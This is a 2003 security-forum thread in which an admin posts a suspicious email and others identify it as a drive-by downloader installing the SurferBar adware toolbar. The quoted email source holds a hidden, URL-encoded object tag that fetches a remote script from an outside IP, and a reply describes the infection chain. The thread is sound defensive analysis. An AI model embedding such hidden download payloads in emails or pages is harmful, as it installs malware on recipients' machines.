Weird mail trying top get "a.cgi", any ideas ?

Discussion in 'Computer Security' started by Maxime Ducharme, Sep 3, 2003.

  1. Hi,
    I received a suspicious email which seems to be an exploit
    of OE to infect people with a trojan or something like that.


    Here's how the email source look like (I removed SMTP IPs & received
    headers):

    =================== BEGIN SOURCE =================
    Message-ID: <h54$-9mutb8--6@qw4.3uoi56>
    From: "Lorna Roach" <>
    Reply-To: "Lorna Roach" <>
    To: <>, <>
    Subject: Hey
    Date: Wed, 03 Sep 03 22:41:51 GMT
    X-Mailer: AOL 7.0 for Windows US sub 118
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
    boundary="AF3E6...967056.7.08E03F7"
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Return-Path:


    --AF3E6...967056.7.08E03F7
    Content-Type: text/html;
    Content-Transfer-Encoding: quoted-printable

    <head>
    <div style=3D"display.none"><object data=3D"http://%363.2%346.=
    %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
    </head>
    <body>
    <p>Hey,</p>
    <p>How have you been?&nbsp; What have you been doing lately?</p>
    <p>Ive just been at home doing nothing :( bored at uni etc.</p>
    <p>Anyway's lets catch up soon,</p>
    <p>Luv,<br>You know who ;)</p>
    <p>&nbsp;</p>
    </body>
    </html>

    --AF3E6...967056.7.08E03F7--
    =================== END SOURCE =================


    This code tries to download this file :

    http://63.246.130.201/cgi-bin/a.cgi

    This host doesnt answer my pings and his tcp port 80 is stealthed.

    I didnt find anything on Google yet.

    Someone recognize a virus in this or I am targeted by someone ?

    I do not like the fact that the email is targeted at 2 specific address
    of our organisation.

    Thanks for any reply

    ---------------------------------------------------------------
    Maxime Ducharme
    Administrateur reseau, Programmeur
    Pandore-Design [http://www.pandore-design.com]
    Maxime Ducharme, Sep 3, 2003
    #1
    1. Advertising

  2. "Maxime Ducharme" <> wrote:

    I saw my first of these last night and have had a couple more reports
    this morning...

    > I received a suspicious email which seems to be an exploit
    > of OE to infect people with a trojan or something like that.


    Close, yes...

    > Here's how the email source look like (I removed SMTP IPs & received
    > headers):


    If you would not mind, I'd like to know the originating IP (or mail server).
    If' you'd rather not post it publicly, please send it to me via Email.

    <<snip>>
    > <head>
    > <div style=3D"display.none"><object data=3D"http://%363.2%346.=
    > %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>


    "URL escaped" encoding of a URl to a file called a.cgi which is a VBScript that
    drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
    pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

    In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
    (that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
    10-second sleep loop making sure that its own auto-start and two of SurferBar's
    registry configuration settings are present. The SurferBar toolbar also makes
    a large nnumber of (pretty tastelessly named) shortcuts in your Start menu and
    in the "Programs" sub-menu thereunder...

    > This code tries to download this file :
    >
    > http://63.246.130.201/cgi-bin/a.cgi


    Yep -- that's what the above encoded URL decodes to...

    > This host doesnt answer my pings and his tcp port 80 is stealthed.


    Yes -- it does seem rather dead now, but last night I could d/l that file and
    the SurferBar toolbar .DLL the downloader is programmed to grab. The main
    surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
    some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
    seems to be now... (Hopefully this means the hosting company has closed
    surferbar.com down...)

    > I didnt find anything on Google yet.


    Try Google Groups and search for "surferbar". There were a couple of dozen hits
    going back 2 or 3 days last night.

    > Someone recognize a virus in this or I am targeted by someone ?


    AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
    spammed.

    > I do not like the fact that the email is targeted at 2 specific address
    > of our organisation.


    Huh???

    > Thanks for any reply



    --
    Nick FitzGerald
    Nick FitzGerald, Sep 4, 2003
    #2
    1. Advertising

  3. Maxime Ducharme

    Elson Mat Guest

    Elson Mat, Sep 4, 2003
    #3
  4. Maxime Ducharme

    Lord Shaolin Guest

    Lord Shaolin, Sep 4, 2003
    #4
  5. Thanks Nick, Elson & Lord for your answers

    ---------------------------------------------------------------
    Maxime Ducharme
    Administrateur reseau, Programmeur


    "Lord Shaolin" <abuse@127.0.0.1> wrote in message
    news:...
    > "Elson Mat" <it.a.sankyu.com.hk> wrote in message
    > news:bj66pm$...
    > > Try this info, symantec found it yesterday.
    > >
    > >

    >

    http://securityresponse.symantec.com/avcenter/venc/data/download.aduent.troj
    > > an.html
    > >
    > >

    >
    > And Spybot S&D has been able to remove it for a while nasty thing that it
    > is.
    >
    > --
    >
    > -+ Shaolin +-
    > Discard what is useless, absorb what is not and
    > add what is uniquely your own.
    >
    > .: http://www.security-forums.com :.
    >
    >
    Maxime Ducharme, Sep 4, 2003
    #5
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. John N
    Replies:
    0
    Views:
    407
    John N
    Jul 10, 2005
  2. Paul Blarmy

    CGI Application error when trying to browse site

    Paul Blarmy, Oct 30, 2005, in forum: Computer Support
    Replies:
    7
    Views:
    2,886
    AlmostBob
    Oct 31, 2005
  3. Replies:
    3
    Views:
    721
    junkie
    Jan 16, 2007
  4. Networking Student
    Replies:
    4
    Views:
    1,251
    vreyesii
    Nov 16, 2006
  5. John Penney
    Replies:
    4
    Views:
    862
    Rick Merrill
    Aug 29, 2006
Loading...

Share This Page